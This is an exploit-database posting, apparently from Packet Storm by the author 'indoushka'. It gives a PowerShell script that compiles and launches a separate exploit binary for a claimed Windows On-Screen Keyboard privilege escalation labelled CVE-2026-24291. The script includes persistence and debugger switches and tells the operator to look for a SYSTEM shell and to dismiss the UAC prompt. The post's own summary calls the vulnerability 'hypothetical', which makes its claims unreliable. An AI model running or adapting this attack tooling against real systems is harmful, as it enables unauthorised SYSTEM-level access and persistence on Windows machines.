Share
## https://sploitus.com/exploit?id=PACKETSTORM:220745
==================================================================================================================================
    | # Title     : OSK EoP Exploit Wrapper Build and Execution Automation Script                                                    |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : No standalone download available                                                                                 |
    ==================================================================================================================================
    
    [+] Summary    : This PowerShell script acts as a wrapper/launcher for a compiled Windows exploit binary targeting a hypothetical OSK (On-Screen Keyboard) Elevation of Privilege vulnerability.
    
    [+] POC        :  
    
    param(
        [switch]$Persist,
        [switch]$Debugger,
        [switch]$Force
    )
    
    Write-Host @"
    ========================================
      CVE-2026-24291 - OSK EoP Exploit
      SYSTEM Privilege Escalation
              by indoushka
    ========================================
    "@ -ForegroundColor Cyan
    
    $msvc = Get-ChildItem "C:\Program Files\Microsoft Visual Studio\*\*\VC\Tools\MSVC\*\bin\Hostx64\x64\cl.exe" -ErrorAction SilentlyContinue | Select-Object -First 1
    
    if (-not $msvc) {
        Write-Host "[!] Visual Studio not found. Install Build Tools." -ForegroundColor Red
        exit 1
    }
    
    $vcVars = "C:\Program Files\Microsoft Visual Studio\2022\BuildTools\VC\Auxiliary\Build\vcvars64.bat"
    if (Test-Path $vcVars) {
        cmd /c "`"$vcVars`" > nul 2>&1 && cl.exe"
    }
    
    Write-Host "[*] Compiling exploit..." -ForegroundColor Yellow
    $source = "osk_eop.cpp"
    $output = "osk_eop.exe"
    
    if (Test-Path $output) { Remove-Item $output }
    
    & cl.exe /EHsc /O2 /MT $source /Fe$output /link advapi32.lib user32.lib
    
    if (-not (Test-Path $output)) {
        Write-Host "[!] Compilation failed" -ForegroundColor Red
        exit 1
    }
    
    Write-Host "[+] Compilation successful" -ForegroundColor Green
    
    Write-Host "[*] Starting OSK for initialization..." -ForegroundColor Yellow
    Start-Process "osk.exe" -WindowStyle Hidden
    Start-Sleep -Seconds 2
    Get-Process "osk" -ErrorAction SilentlyContinue | Stop-Process -Force
    
    $args = @()
    if ($Persist) { $args += "--persist" }
    if ($Debugger) { $args += "--debugger" }
    
    Write-Host "[*] Running exploit..." -ForegroundColor Green
    & .\$output $args
    
    Write-Host "`n[*] Check for SYSTEM shell. UAC prompt may appear - dismiss it." -ForegroundColor Cyan
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================